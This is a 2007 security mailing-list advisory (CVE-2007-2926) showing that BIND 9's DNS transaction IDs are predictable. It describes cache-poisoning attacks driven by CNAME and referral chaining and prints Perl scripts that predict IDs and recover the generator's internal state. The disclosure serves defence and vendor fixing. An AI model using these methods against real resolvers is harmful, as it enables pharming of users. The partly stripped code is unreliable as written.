From: SecuriTeam <>
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Date: 24 Jul 2007 12:50:24 +0200
Subject: [NEWS] BIND 9 DNS Cache Poisoning
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BIND 9 DNS Cache Poisoning
The paper shows that BIND 9 DNS queries are predictable - i.e. that the
source UDP port and DNS transaction ID can be effectively predicted. A
predictability algorithm is described that, in optimal conditions,
provides very few guesses for the "next" query (10 in the basic attack,
and 1 in the advanced attack), thereby overcoming whatever protection
offered by the transaction ID mechanism. This enables a much more
effective DNS cache poisoning than the currently known attacks against
BIND 9. The net effect is that pharming attacks are feasible against BIND
9 caching DNS servers, without the need to directly attack neither DNS
servers nor clients (PCs). The results are applicable to all BIND 9
releases [1], when BIND (the named daemon) is in caching DNS server
Vulnerable Systems:
* BIND versions 9.4.0-9.4.1
* BIND versions 9.3.0-9.3.4
* BIND versions 9.2.0-9.2.8
* BIND versions 9.1.0-9.1.3
* BIND versions 9.0.0-9.0.1
Immune Systems:
* BIND version 8
* BIND version 4
1. Introduction
Attacks against DNS, and particularly the concept of DNS cache poisoning
has been known for over a decade (e.g. [2] section 5.3 was published in
1989 and [3] was published in 1993). A concise threat analysis for the
existing DNS infrastructure can be found in [4]. The focus of this paper
is on DNS cache poisoning attack.
Typically, a DNS query is sent over the connectionless UDP protocol. The
UDP response is associated with the request via the source and destination
host and port (UDP properties), and via the 16 bit transaction ID value
(the response's transaction ID should be identical to the request's
transaction ID). Assuming that an attacker knows that a DNS query for a
specific domain is about to be sent, from a specific DNS server/resolver,
the attacker can trivially predict the source IP address (the address of
the requesting name server/client), the destination IP address (the
address of the target name server), and the destination UDP port (53 the
standard UDP port for DNS queries). The attacker needs additional 2 data
items the source UDP port, and the DNS transaction ID, to be able to
blindly inject his/her own response (before the target server's response
typically DNS server use the first matching response and silently discards
any further responses).
As mentioned above, the transaction ID is 16 bits quantity, and the source
UDP port is theoretically 16 bits quantity too (though for practical
reasons, only a sub-range is used as UDP source ports e.g. in
1024/1025-4999/5000 in older operating systems, and 49152-65535 in newer
operating systems).
So in theory, the total entropy from an attacker's point of view is 32
bits, and practically (in older operating systems) log2(3976 216) which is
almost 28 bits, or (in newer operating systems) log2(3976 216) which is 30
Note that for practical reasons, it is not a good idea to use a
combination of transaction ID and UDP port which are already in the
"waiting queue" for a DNS response. Typically there are very few such
pending requests, so this has negligible effect on the overall entropy.
In BIND 9 the UDP source port is predictable it is determined when the
daemon is started or shortly thereafter (the UDP port is unchanged, as
mentioned in [5] and its thread).
In general, predictability of the transaction ID can facilitate DNS cache
poisoning attacks. This was mentioned in [2] section 5.3, [3] and [6]
section 6.1. In April 1997, it was discovered that BIND (4.9.5) generates
a sequential transaction ID ([7]); it seems though that the BIND
developers (led by Paul Vixie) were aware of this attack vector back in
1995 (see [6] section 6.1). While the advisory contained a detailed fix
suggestion, using modular arithmetic PRNG, the issue was actually fixed by
introducing a hash-table based PRNG for BIND 8.2 (released March 1999),
but the code was rewritten in BIND 9.0.0 (released September 2000) to make
use of a linear feedback shift register based PRNG.
To clarify: the rest of this discussion assumes BIND 9.4.1 (or 9.x in
general) wherein those old vulnerabilities do not exist.
In April 2001 a paper ([8]) was released, describing the use of a method
called "attractors" to outline anomalies and predictability in numeric
sequences. In January 2003, this method was applied to BIND 9.2.2rc1
([9]), concluding that "BIND 9's random number sequence is predictable 20%
of the time with a spoofing set size of 5000". However, this result is
only roughly about 2.5 times better than what can be achieved using 5000
randomly chosen values, and as will be shown below, a much better result
can be obtain by a closer analysis. Note that this analysis was conducted
prior to (and perhaps served as a trigger to) the fix introduced in BIND
9.2.3rc1 (August 2003)1.1 In BIND 9.2.3rc1, an implementation bug was
fixed in the PRNG (see [10], bugs 1406 and 1407)
Combining the above "attractors" attack with the static UDP port yields an
attack that requires about 5000 DNS responses to poison the cache. It is
doubtful that such attack will be practical, since a DNS response cannot
be a lot shorter than 80 bytes (in reality the attacker would probably
need a bit more, so 100-150 is a better assumption, but nevertheless 80
can be used as a lower limit, for the benefit of the doubt), and 5000 such
responses yield 400KB. That much data should arrive at the DNS stack
between the time it emits the DNS query to be poisoned and the time the
genuine server's response arrive to it. A single DNS round trip typically
takes anywhere between few dozen milliseconds to few hundred milliseconds
(for example, consider the 0-referral latency in table 1 of [11], or the
statistics for the .COM gTLD in [12]). Assuming 100ms round trip, that
requires the attacker a significant uplink bandwidth of 32 megabit/sec
(similar calculations can be found in section 6 of [23]). Even if the
attractor method is refined and an order of magnitude improvement is
achieved, it would still require an uplink of 3.2 megabit/sec, which is
not trivial on one hand, and may still not be enough on the other hand (it
assumes 100ms round trip for the genuine DNS query, and in some cases the
genuine DNS server may respond faster). And all this only guarantees 20%
success rate.
Another well known attack against DNS caching/resolution is the "birthday
attack". The birthday attack against DNS servers is hinted to in [5] (July
2001) and described in fullness in [13] (November 2002); a more elaborate
discussion can be found in [9] and [14].
Essentially, where there are N entropy bits, the attack consists of
sending simultaneously about 2N/2 DNS queries and 2N/2 DNS responses in
order to make a match (with high enough probability). Unfortunately, the
birthday attack cannot be combined with the "attractors" method. That's
because the birthday attack needs multiple DNS queries (to the same target
server), and each such query results in its own transaction ID. Using the
attractor to predict the next transaction ID requires that the previous
sequence number be known. Yet after the first query is sent, this
condition cannot be met.
Combining the birthday attack with the UDP port information yields an
attack that requires simultaneous launching of few hundred DNS queries and
responses (we have N=16 so 2N/2=256) to cover for the 16 entropy bits of
the DNS transaction ID. In order for the attack to be effective, this
burst should take no longer than the round trip of the DNS query and
answer from the genuine server (say, 100ms). However, forcing the DNS
stack to receive several hundred DNS queries in a short period of time is
oftentimes not realistic, especially when considering DNS security
architecture such as Split-Split DNS. With Split-Split DNS architecture,
the only way to access the caching DNS server is from within the
organization (or ISP) "external" queries are not served, e.g. they may
be blocked by a firewall. This is a pretty standard setup nowadays (it is
the recommended DNS secure architecture). The paper assumes, therefore,
that the attacker has no direct access to the internal network, i.e. that
the attacker cannot run home made executable (attack scripts) from the
internal network. This pretty much rules out the option to hit the DNS
stack with thousands of queries per second, thereby rendering the birthday
attack impractical.
The attacks described in this paper make use of the predictable nature of
BIND 9 transaction IDs to attack the DNS stack. It is assumed that the
stack can be forced to perform DNS queries using a malicious web page (the
concept of poisoning DNS cache through a malicious web page is described
in [4] and demonstrated in [15] for a different kind of DNS attack). This
is a real-life condition, but of course it is quite limiting in what the
attacker can do the attacker, for example, cannot force a burst of
hundreds of queries all for the same hostname to be emitted from the same
client. Nevertheless, it will be shown that since the transaction ID (and
the UDP source port) is predictable enough, this suffices to mount a
successful attack.
2. Attacking the BIND 9 DNS Cache Server ("named")
2.1 Observations on BIND's "named"
The BIND 9 named server uses static UDP source port (acquired at the
startup of the daemon's run), and generates a very predictable transaction
ID. A full analysis of the transaction ID generation mechanism was carried
out using the BIND freely available source code. The research results were
verified using live captures of named queries obtained from named (from a
standard BIND 9.4.1 installation) running on Windows XP SP2. Since the
analysis doesn't rely on the initialization of the transaction ID
mechanism, but rather on the way it advances (which is common to all
platforms), the results thus obtained are applicable to all hardware and
software platforms.
The PRNG in use for generating transaction IDs is implemented in the BIND
9.4.1 source ([16]) file ./lib/isc/lfsr.c. In essence, the caller
(function qid_allocate() in file ./lib/dns/dispatch.c) calls
isc_lfsr_init() at the beginning of the run for each of the two "lfsr"
variables to initialize the PRNG. As of this moment, the caller (function
dns_randomid() in file ./lib/dns/dispatch.c) calls isc_lfsr_generate32 for
each transaction ID, obtaining 32 pseudo random bits with each call (and
using the least significant 16 bits of these as the transaction ID).
The internal state thus consists of two lfsr variables, which are 32 bit
quantities. With each call to isc_lfsr_generate32, they are advanced as
mutual feedback linear feedback shift registers, as following:
C code (adapted from the above files and modified for clarity):
unsigned int lfsr_generate(unsigned int lfsr_state, unsigned int tap)
if (lfsr_state & 1)
lfsr_state = (lfsr_state >> 1) ^ tap;
lfsr_state >>= 1;
return lfsr_state;
unsigned int lfsr_skipgenerate(unsigned int lfsr_state,
unsigned int tap,
unsigned int skip)
if (skip)
lfsr_state = lfsr_generate(lfsr_state, tap);
lfsr_state = lfsr_generate(lfsr_state, tap);
return lfsr_state;
skip1 = lfsr1_state & 1;
skip2 = lfsr2_state & 1;
lfsr1_state = lfsr_skipgenerate(lfsr1_state, tap1, skip2);
lfsr2_state = lfsr_skipgenerate(lfsr2_state, tap2, skip1);
trxid = (lfsr1_state ^ lfsr2_state) & 0xFFFF;
In words, the algorithm is as following:
- The least significant bit of each variable is saved.
- Each variable is advanced (shifted right) as an LFSR (with hard-wired,
constant tap) once if its saved peer bit (see above) is 0 and twice if the
saved peer bit is 1.
- Finally, the 16 bit transaction ID is the 16 least significant bits of
the XOR value of the two variables. It is serialized with most significant
byte first, then least significant byte (big endian style).
It is important to note that the above description does not cover a code
branch (in function lfsr_generate(), file ./lib/isc/lfsr.c) which, for
each variable, if its state is 0, then it is re-seeded. In reality, this
never happens, because the initial seeding ensures that the initial state
in each variable is never 0. And since both LFSR taps are reversible, it
can be easily seen that neither variable can assume the value 0.
The net result is, therefore, a system comprising of two 32 bit mutually
clock-controlled LFSRs, whose states are linearly combined to yield 16 bit
output. In essence, this is a weak version (since the output is 16 bits,
as opposed to the traditional 1 bit) of the well studied cryptosystem
known by many names: "bilateral stop/go (LFSR) generator", "mutually clock
controlled (LFSR) generator" and "mutual (or bilateral) step-1/step-2
(LFSR) generator". The variant used in BIND 9 is very weak due to its
large output comprising of 16 bits (out of the combined internal state of
16 bits). As such, it lends itself to some trivial attacks as can be seen
An observation that plays an important role later is as following. When
the transaction ID least significant bit is 0, it means that the next
step, the two LFSRs will advance in the same way (because their peer bits
are identical). This can be either one step (when the two bits are 0) or
two steps (when the two bits are 1).
Assuming now that the least significant bit of the transaction ID is
indeed 0, there are two branches, depending on the actual values of the
pair of least significant bits in the two LFSRs:
* When the two bits are 0 (probability 1/2), it means that the next value
of each LFSR is its current value, shifted right, with an unknown most
significant bit. The XOR of the least significant 16 bits (i.e. the next
transaction ID) is therefore the current transaction ID, shifted right
once, with an unknown most significant bit. In other words, when the two
least significant bits are 0, there are two candidates for the next
transaction ID.
* When the two bits are 1 (probability 1/2), the situation is slightly
more complicated. Both registers are advanced twice. Moreover, in the
first step, both registers force their taps to XOR into them (because the
least significant bits are 1). However, at the second step, the bits are
unknown. But that's not the end of it, because while the exact bits are
unknown, their XOR is known, so there are actually only two cases
(guesses). And of course, the two most significant bits of the result are
unknown too, so there are 8 candidates altogether in this branch.
To summarize, when the least significant bit of the transaction ID is 0,
there are 10 possible values (and each such value is easily calculated)
for the next transaction ID (2 when both bits are 0, and 8 when both bits
are 1). Note that the probability of the values is not uniform: since the
probability for two 0 bits is , it follows that each of the two values
associated with this branch has probability , while the probability of
the two 1 bits is , which means that each value of the eight values
associated with this branch has probability 1/16. In information theoretic
terms, when the last significant bit of the transaction ID is 0, the
entropy of the next transaction ID is 3 bits, instead of the theoretic
maximum of 16 bits.
2.2 The basic attack
The attack target is an organization with BIND 9 DNS caching server. This
server does not answer DNS queries from the Internet, and no direct access
to the internal network is available for the attacker. The goal of the
attack is to poison the cache entry for the domain It is
assumed that this domain is not yet cached (or that its cache entry has
expired). The attacker needs to make the cache server cache the
authoritative name server entry for as the attacker's IP
address, rather than the IP address of the real authoritative name server
The attacker lures one of the network users to visit the attacker's web
page. This page contains an image URL to, say, The
discussion below skips the part where the name server obtains the
authoritative name-server for and focuses on the query for It is sent to the attacker's name server. This name
server observes the least significant bit of the DNS transaction ID. If it
is not 0, it sends back a CNAME record for the next host name (i.e. a
CNAME that points at The BIND 9 DNS server will then
request with the next ID value. This process repeats
itself few times (up to 14 times due to CNAME chaining support by BIND 9)
until the bit value is 0. At this point, the attacker name server returns
a CNAME record that points at Note that altogether up to
(and possibly including) 15 CNAME "redirections" were performed - the BIND
9 DNS server follows up to (and including) 15 CNAME redirections. However,
half of the time, the first DNS query (to already has
the least significant bit 0, and statistically speaking, the expected
length of the required chain is 2 (up to a small quantity due to the
cutoff at chain length 15).
The above practice is called CNAME chaining2. While it is probably the
easiest to explain, other methods (possibly better, in some aspects) of
forcing a DNS caching server to send multiple queries are discussed later
in this document.
Note that the BIND 9 DNS server handles CNAME chains (up to 16
"redirections") well, but will only return the first 15 CNAME records
(i.e. the 16th CNAME will not be included in the response returned to the
client). Therefore, when the chain contains up to (and including) 15
redirections, the response to the client will be functional, i.e. will
include the IP address of the final CNAME.
Assuming the attacker received a query whose transaction ID is even and
the attacker then redirected to, the second phase begins.
The attacker needs to prepare the 10 possible DNS answers, corresponding
to the 10 possible transaction ID values (as described above), and with
the same UDP destination port (which is copied from the query source
port), with source port 53, destination IP address being the request's
source IP address, and the source IP address should be that of the name
server for the .COM gTLD (which will be queried by the DNS caching name
server for the resolution).
The attacker can start sending those 10 DNS responses, as rapidly as
possible, cycling through them again and again. Even with a modest 256Kbit
uplink and with even 150 bytes per response it is possible to complete a
cycle in less than 50 milliseconds. This increases the likelihood that the
spoofed response (from the attacker's server) will reach the DNS server
before the genuine DNS response (from the gTLD server).
Note that in order to maximize the likelihood of the attack to succeed,
the attacker may order the transaction ID values used in the DNS
responses, such that the high probability values (the two values
associated with least significant bits being 0) are transmitted first.
The Perl script in Appendix B demonstrates the preparation of the
candidate transaction IDs. It takes one command line argument (the current
transaction ID, expressed as 4 hexadecimal digits, and is supposed to have
least significant bit 0) and it prints the 10 possible next transaction ID
values (the two most likely values are printed first).
2CNAME chains are discouraged per the DNS RFC 1034 ([17]), section 3.6.2.
Indeed, "standard" name servers eliminate such indirections from a static
DNS configuration by resolving CNAME chains internally and providing a
consolidated result. At the same time, CNAME chaining is in use by many
good and respectable domains, e.g. when a domain uses Content Delivery
Network (CDN) services it typically points at the CDN host (on a different
domain) via a CNAME record. Therefore, to implement the above CNAME chain
it is advised to use a name server which provides user-controllable
runtime configuration, such as [18].
2.3 An advanced attack: full PRNG state reconstruction
A shortcoming of the basic attack is that it provides 10 candidates for
the next transaction ID. Also, it cannot predict sequences of transaction
IDs. It merely uses an obvious weakness in the PRNG scheme to predict the
next value in half the cases. However, since the BIND 9 PRNG is weak, it
is also feasible to completely predict it (i.e. to reproduce its internal
state in fullness). For this, a sequence of 13-15 consecutive DNS queries
is needed (possibly using the CNAME chaining technique described above).
An algorithm that reconstructs the state of the two LFSRs after the first
entry of the transaction ID sequence is generated, is as following (using
straightforward and well known cryptanalysis techniques):
- Guess the 6-7 least significant bits of the first LFSR (hereinafter the
state assume is always the state right after the first transaction ID in
the sequence is generated). Since the first transaction ID is the XOR of
the least significant 16 bits of the two LFSRs, it immediately follows
that the 6-7 (respectively) bits of the second LFSR become known.
- Per each such guess (there are 64/128 such guesses, respectively),
advance the LFSRs and observe the XOR of their results, while all the time
keeping in mind that as the registers advance, the "window of known bits"
shrinks. Each register has its own window (since they not necessarily
advance at the same pace), but since the least significant bits are known
(for few steps, at least), the way they advance is completely known. This
can be used to eliminate wrong guesses. At the end of this process, it is
expected that very few candidates remain.
- Per each remaining candidate, try guessing alternately another bit of
the first LFSR, and possibly eliminate using the above technique
(following the LFSRs as they advance), then do so for the second LFSR,
alternating between the two. Usually (when 13 or more transaction IDs are
available), it is possible to improve by at least one bit per iteration,
but occasionally there's no escape from guessing the bit and moving on.
- When one of the registers is fully known (all 32 bits) it can be
followed "forever" (its "window" becomes infinite). When the two LFSRs are
fully known, the internal state has been completely reconstructed.
Note that since each shift register advances once or twice per transaction
ID, it follows that it takes 8-16 advances to get the most significant bit
of each register to appear in the transaction ID. Because the algorithm
above uses the state after the first transaction ID as its initial state,
the algorithm actually requires at least 9-17 consecutive queries to fully
reconstruct the internal state ("at least", because if say both registers
advance by exactly 16 steps, the most significant bits will only be
observed XORed with each other, hence one bit of information will still be
missing). The exact number depends on the advancement schedule of both
registers, but the probability for a success within m+1 consecutive
queries can be easily bounded from above by the probability of the minimum
of two binomial random variables variables m+B(m, ) to be >= 16 (keep in
mind that the advancement is 1+B(1, 1/2)), and this bound is quite close
to the actual probability of success. It can easily be seen that good
results are therefore expected when m=12 (13 queries), and excellent ones
when m=14 (15 queries).
The Perl script in Appendix C takes around 10-15 milliseconds (on IBM
ThinkPad T60 laptop with Intel Centrino CoreDuo T2400 CPU @1.83GHz and
Windows XP SP2 operating system certainly a moderately powered machine)
to extract the internal state from 13-15 consecutive transaction IDs. It
takes one command line argument the name of its input file. This file is
assumed to contain lines, where each line describes a single DNS query (4
hex digits for the transaction ID). A file in this format can be produced
from a PDML file (one of the export formats of the WireShark protocol
analyzer) using the XSL transformation in Appendix A.
Rewriting the algorithm in a compiled language (e.g. C/C++) is expected to
yield at least an order of magnitude improvement in performance, thus
getting it to run in around 1-2 milliseconds (or less).
2.4 Attack variants
2.4.1 Pre-computed table
The basic attack algorithm calculates the 10 candidates in run time, given
the current transaction ID (provided it is even). Another approach can be
to pre-calculate a table for all (even) transaction IDs, and per each list
all 10 candidates. Such table has 215 entries (since there are 215 even
transaction IDs), and each entry is a list of 10 candidates, i.e. ten 16
bit quantities (20 bytes altogether). Thus the total storage needed for
this table is 640KB. Generating this table takes less than half a second
with a Perl script, so it should probably take few dozen milliseconds (or
less) in native C/C++ code.
2.4.2 Information theoretic results
Experiments with the full PRNG state reconstruction script revealed that
typically when there are less than 13-15 known transaction IDs, more than
one internal state candidate is found. All candidates generate the same
transaction ID sequence, and hence are indiscernible from one another.
This means that indeed typically around 13-15 transaction IDs are indeed
necessary (theoretically!) to reconstruct the internal state, or in other
words, that the above algorithm (and script) are optimal from an
information theoretic aspect.
2.4.3 Linear equations
Note that the PRNG state reconstruction algorithm makes use of incremental
enumeration and elimination, with basis guess of 6-7 bits. An alternative
approach is to represent the information as linear equations (while taking
into account the non-uniform advance in the registers). Again this is a
well known cryptanalytic technique for attacking such a system. However,
in this case it seems that guessing and elimination is faster than solving
the set of equations.
2.4.4 Earlier versions of BIND 9
With versions of BIND 9 earlier than 9.2.3rc1, the shift register taps are
slightly different (the bug fix introduced in 9.2.3rc1 amounts to changing
the tap of the second shift register, as well as changing the way the tap
is interpreted in both registers, but the underlying algorithm was not
modified). Both attacks described above should work for earlier versions
of BIND 9 (though this was not explicitly tested), with the following tap
$tap1=0xc000002b; # (0x80000057>>1)|(1<<31)
$tap2=0xc0000061; # (0x800000c2>>1)|(1<<31)
2.4.5 Additional ways to force multiple queries
The CNAME chain can employ its final redirection as an authoritative NS
referral (instead of a CNAME redirection).
CNAME chaining is not the only way to force the target DNS server to send
multiple queries to the attacker's server. Another such way is referral
chaining (i.e. using NS authority records). The technique is as following:
for a malicious domain, the attacker establishes a chain of
sub-domains: z.z.z.z The attacker forces the target
DNS server to resolve z.z.z.z The attacker's server
responds with a NS record in the authority section whose name is and whose value is the attacker's name server (this may
require a glue record in the additional section if the attacker's name
server is in the domain). Upon the next query, the attacker's
server responds with NS record, and so forth. BIND9 will
generate a new transaction ID with each such query, and thus the attacker
can collect a sequence of consecutive transaction ID's. Experiments show
that it's possible to extract sequences of length 100 (probably even more,
the limit is likely driven from the maximum DNS name size 256
characters, so the length limit is probably slightly less than 128). The
final answer from the attacker can be a CNAME record or an authority NS
record pointing at, to force DNS resolution of the target
3. Conclusions
It is saddening to realize that 10-15 years after the dangers of
predictable DNS transaction ID were discovered, still the leading DNS
cache server does not incorporate strong transaction ID generation,
particularly such one that is based on industrial grade cryptographic
The paper demonstrated that the "classic" DNS poisoning attack is still
applicable for BIND 9, and the attack described is far more effective than
any attack described. It requires much less "guesses" than the
"attractors"-based attack, and it does not require "query access" to the
DNS server (except for a single triggering query), as opposed to the burst
of hundreds of queries required by the birthday attack, rendering the
latter almost ineffective when Split-Split DNS configuration is used.
The fact that the BIND 9 transaction ID can be predicted for an extended
time period has some interesting consequences. For example, it means that
if DNS queries made by a BIND 9 caching DNS server to a 3rd party DNS
server are recorded by that 3rd party DNS server (e.g. in log files), then
potentially anyone with access to this data may be able to reconstruct the
BIND 9 internal PRNG state and thus be able to reconstruct the next
transaction IDs. Quite likely, the BIND server already sent additional
queries to other DNS servers, but if the number of additional queries is
low enough (e.g. few hundreds), it still enables an attacker to
effectively poison the BIND 9 server cache.
By the same principle, an attacker who once obtained the internal state
can quite effectively continue to poison the cache for multiple "target
queries" using the known internal state, without the need to reconstruct
it again (possibly the attacker would like to obtain one sample of the
current transaction ID to re-synchronize his/her copy of the internal
state by running it forward until it collides with the sample). This is
again stronger than other attack methods which require exerting the same
amount of effort for any additional poisoning attempt.
To some extent, the attack can be thought of as "degrading" the DNS
transaction ID mechanism of BIND 9 to something close to the "increment by
one" algorithm of the 1990's. Hopefully this analogy can help the security
community to accurately assess the gravity of this issue.
4. Disclosure timeline
May 29th, 2007 ISC were notified via email.
July 2007 ISC releases a fixed version. Simultaneously, Trusteer
discloses the vulnerability to the public (in the form of this document).
5. Vendor/product status
All stable versions of BIND 9 to date (except the ones released
simultaneously with this paper) are vulnerable, i.e. BIND 9 versions
9.4.0-9.4.1, 9.3.0-9.3.4, 9.2.0-9.2.8, 9.1.0-9.1.3 and 9.0.0-9.0.1.
BIND 8 and BIND 4 are not affected.
The vendor (Internet Systems Consortium, has released
a new version of BIND 9 which, according to the vendor, addresses this
issue. Effective immediately, the new version can be downloaded from the
vendor's web site.
The vendor designates this issue as #2203 (RT#16915).
The vendor has obtained the following MITRE vulnerability designation for
this issue: CVE-2007-2926.
6. References
[1] "Internet Systems Consortium BIND 9.4.1" (Internet Systems Consortium
web page) <>
[2] "Security Problems in the TCP/IP Protocol Suite" (Computer
Communications Review 2:19, pp. 32-48), Steven M. Bellovin (AT&T Bell
Laboratories), April 1989
Thesis), Christoph Schuba, August 1993
[4] "Threat Analysis of the Domain Name System (DNS)" (IETF RFC 3833),
Derek Atkins and Rob Austein, August 2004
[5] "Re: BIND's vulnerability to packet forgery" (mailing.unix.bind-users
mailing list submission), Daniel J. Bernstein, July 29th, 2001
[6] "DNS and BIND Security Issues" (Proceedings of the Fifth USENIX UNIX
Security Symposium), Paul Vixie (Internet Software Consortium), May 11th,
[7] "BIND Vulnerabilities and Solutions" (Secure Networks Inc. and CORE
Seguridad de la Informacion Security Advisory), Ivan Arce and Emiliano
Kargieman, April 22nd, 1997
[8] "Strange Attractors and TCP/IP Sequence Number Analysis", Michal
Zalewski, April 21st, 2001
[9] "DNS Cache Poisoning - The Next Generation", LURHQ Threat Intelligence
Group, January 27th, 2003 <> (HTML)
[10] "BIND 9.2.3", Internet Systems Consortium, February 4th, 2004
[11] "DNS Performance and the Effectiveness of Caching" (1st ACM SIGCOMM
Internet Measurement Workshop, San Francisco, CA), Jaeyeon Jung, Emil Sit,
Hari Balakrishnan and Robert Morris, November 2001
[12] "DNS com net Connectivity"
[13] "Vulnerability in the sending requests control of Bind versions 4 and
8 allows DNS spoofing" (CAIS alert ALR-19112002a), Vagner Sacramento and
Ccais/RNP, November 19th, 2002
[14] "Vulnerability Note VU#457875" (CERT Advisory), Allen Householder and
Ian A Finlay, December 19th, 2002
[15] "DNS Poisoning" (demonstration web page), Ketil Froyn, 2003
[16] "ISC Software Download - Downloading: BIND 9.4.1 Source" (Internet
Systems Consortium download web page)
Mockapetris, November 1987 <>
[18] "Stanford::DNSserver - A DNS Name Server Framework for Perl", Rob
Riepel and other contributors (see
<> <>
Paul Mockapetris, November 1987 <>
[20] "How long can an NS chain be?" (NameDroppers mailing list), Daniel J.
Bernstein, December 28th, 1998
[21] "Clarifications to the DNS Specification" (IETF RFC 2181), Robert Elz
and Randy Bush, July 1997 <>
[22] "Command Line Transformations Using msxsl.exe" (MSDN XML General
Technical Articles), Andrew Kimball, September 2001
[23] "Measures to prevent DNS spoofing" (Internet-Draft, expired), Bert
Hubert (Netherlabs Computer Consulting BV) and Remco van Mook (Virtu),
August 14th, 2006
Appendix A XSL file
This XSL file can be applied to the PDML export file produced by the
WireShark network analyzer (a similar XSL can be used for Ethereal, though
the latter uses slightly different field names). It extracts data per each
DNS query into a single line, separated by spaces. The following fields
are extracted:
* DNS transaction ID (4 hex digits)
* Capture timestamp (seconds, 9 digits after the decimal point)
* Query object (string)
* UDP source port (4 hex digits)
The XSL transformation can be applied by any XSLT engine, e.g. Microsoft
MSXSL ([22]).
The Perl script in appendix C assumes the output of this XSL
transformation as its input.
It is advised that WireShark filters be used prior to applying the XSL
transformation, because the former is much quicker than the latter, e.g.
filtering for ip.src== and dns.flags.response==0 before exporting.
<?xml version="1.0" encoding="ISO-8859-1"?>
<xsl:stylesheet version="1.0"
<xsl:strip-space elements="*"/>
<xsl:output method="text" encoding="ISO-8859-1"/>
<xsl:template match='/pdml/packet/proto[@name="dns" and
<xsl:value-of select='field[@name=""]/@value' />
select='../proto[@name="geninfo"]/field[@name="timestamp"]/@value' />
select='field[@show="Queries"]/field/field[@name=""]/@show' />
select='../proto[@name="udp"]/field[@name="udp.srcport"]/@value' />
Appendix B BIND 9 simple prediction script
# For BIND9 v9.2.3-9.4.1:
# For BIND9 v9.0.0-9.2.2:
# $tap1=0xc000002b; # (0x80000057>>1)|(1<<31)
# $tap2=0xc0000061; # (0x800000c2>>1)|(1<<31)
if (($txid & 1)!=0)
die "lsb is not 0. Can't predict the next transaction ID.\n";
# One bit shift (assuming the two lsb's are 0 and 0)
for ($msb=0;$msb<(1<<1);$msb++)
push @cand,(($msb<<15)|($txid>>1)) & 0xFFFF;
# Two bit shift (assuming the two lsb's are 1 and 1)
# First shift (we know the lsb is 1 in both LFSRs):
if (($v & 1)==0)
# After the first shift, the lsb becomes 0, so the two LFSRs now have
# identical lsb's: 0 and 0 or 1 and 1
# Second shift:
$v1=($v>>1); # 0 and 0
$v2=($v>>1)^$tap1^$tap2; # 1 and 1
# After the first shift, the lsb becomes 1, so the two LFSRs now have
# different lsb's: 1 and 0 or 0 and 1
# Second shift:
$v1=($v>>1)^$tap1; # 1 and 0
$v2=($v>>1)^$tap2; # 0 and 1
# Also need to enumerate over the 2 msb's we are clueless about
for ($msbits=0;$msbits<(1<<2);$msbits++)
push @cand,(($msbits<<14)|$v1) & 0xFFFF;
push @cand,(($msbits<<14)|$v2) & 0xFFFF;
print"Predicting - the next transaction ID is one of: ";
for (my $k=0;$k<10;$k++)
printf "%04x ",$cand[$k];
Appendix C BIND 9 PRNG reconstruction script
# For BIND9 v9.2.3-9.4.1:
# For BIND9 v9.0.0-9.2.2:
# $tap1=0xc000002b; # (0x80000057>>1)|(1<<31)
# $tap2=0xc0000061; # (0x800000c2>>1)|(1<<31)
use Time::HiRes qw(gettimeofday);
# Read all data from file. It is assumed to be in the format generated
# by the XSL transformation described in appendix A.
open(FD,$ARGV[0]) or die "ERROR: Can't open file $ARGV[0]";
while(my $line=)
# File format: TXID[4 hex] (ignore everything beyond those 4 digits)
if ($line=~/^([0-9a-fA-F]{4})/x)
push @txid,hex($1);
die "ERROR: Can't parse line at count=$count.\n";
print "INFO: Found $count DNS queries in file.\n";
sub next_trxid
my ($lfsr1,$lfsr2)=@_;
my $val;
for (my $i=0;$i<$count+1;$i++)
$val=($lfsr1^$lfsr2) & 0xFFFF;
$skip1=$lfsr1 & 1;
$skip2=$lfsr2 & 1;
for (my $j1=0;$j1<=$skip2;$j1++)
$lfsr1 = ($lfsr1>>1) ^ (($lfsr1 & 1)*$tap1);
for (my $j2=0;$j2<=$skip1;$j2++)
$lfsr2 = ($lfsr2>>1) ^ (($lfsr2 & 1)*$tap2);
#printf "%04x ",$val;
return $val;
sub verify
my ($lfsr1,$width1,$lfsr2,$width2)=@_;
for (my $i=0;$i<$count;$i++)
my $cand=($lfsr1^$lfsr2) & 0xFFFF;
my $min_width=($width1<=$width2) ? $width1 : $width2;
$min_width=($min_width<=16) ? $min_width : 16;
if ($min_width<=0)
return 1;
my $mask=(1<<$min_width)-1;
if (($cand & $mask) != ($txid[$i] & $mask))
return 0;
$skip1=$lfsr1 & 1;
$skip2=$lfsr2 & 1;
for (my $j1=0;$j1<=$skip2;$j1++)
$lfsr1 = ($lfsr1>>1) ^ (($lfsr1 & 1)*$tap1);
if ($width1<32)
for (my $j2=0;$j2<=$skip1;$j2++)
$lfsr2 = ($lfsr2>>1) ^ (($lfsr2 & 1)*$tap2);
if ($width2<32)
return 1;
sub phase2
my ($lfsr1,$width1,$lfsr2,$width2)=@_;
my $motion_detected=0;
if ($width1<32)
my $guess_0=verify($lfsr1|(0<<$width1),$width1+1,$lfsr2,$width2);
my $guess_1=verify($lfsr1|(1<<$width1),$width1+1,$lfsr2,$width2);
if ($guess_0 ^ $guess_1)
#Exactly one is correct. So we know the bit.
if ($guess_1)
elsif ((!$guess_0) and (!$guess_1))
# Inconsistent state, hence wrong guess in the first place
return 0;
if ($width2<32)
my $guess_0=verify($lfsr1,$width1,$lfsr2|(0<<$width2),$width2+1);
my $guess_1=verify($lfsr1,$width1,$lfsr2|(1<<$width2),$width2+1);
if ($guess_0 ^ $guess_1)
#Exactly one is correct. So we know the bit.
if ($guess_1)
elsif ((!$guess_0) and (!$guess_1))
# Inconsistent state, hence wrong guess in the first place
return 0;
if (($width1==32) and ($width2==32))
# Final verification
if (verify($lfsr1,32,$lfsr2,32))
push @cand_lfsr1,$lfsr1;
push @cand_lfsr2,$lfsr2;
return 1;
# false alarm
return 0;
if ($motion_detected)
# At least one width was improved.
return phase2($lfsr1,$width1,$lfsr2,$width2);
# Resort to bit guessing.
if ($width1<32)
# Guessing another bit in LFSR1 and continuing...
# Guessing another bit in LFSR2 and continuing...
my $start_time=gettimeofday();
my $good=0;
for (my $lfsr1=0;$lfsr1<(1<<$initial_guess_bits);$lfsr1++)
my $lfsr2=($txid[0]^$lfsr1) & ((1<<$initial_guess_bits)-1);
if (verify($lfsr1,$initial_guess_bits,$lfsr2,$initial_guess_bits))
my $end_time=gettimeofday();
print "INFO: ".$good." candidates found:\n";
for (my $k=0;$k<$good;$k++)
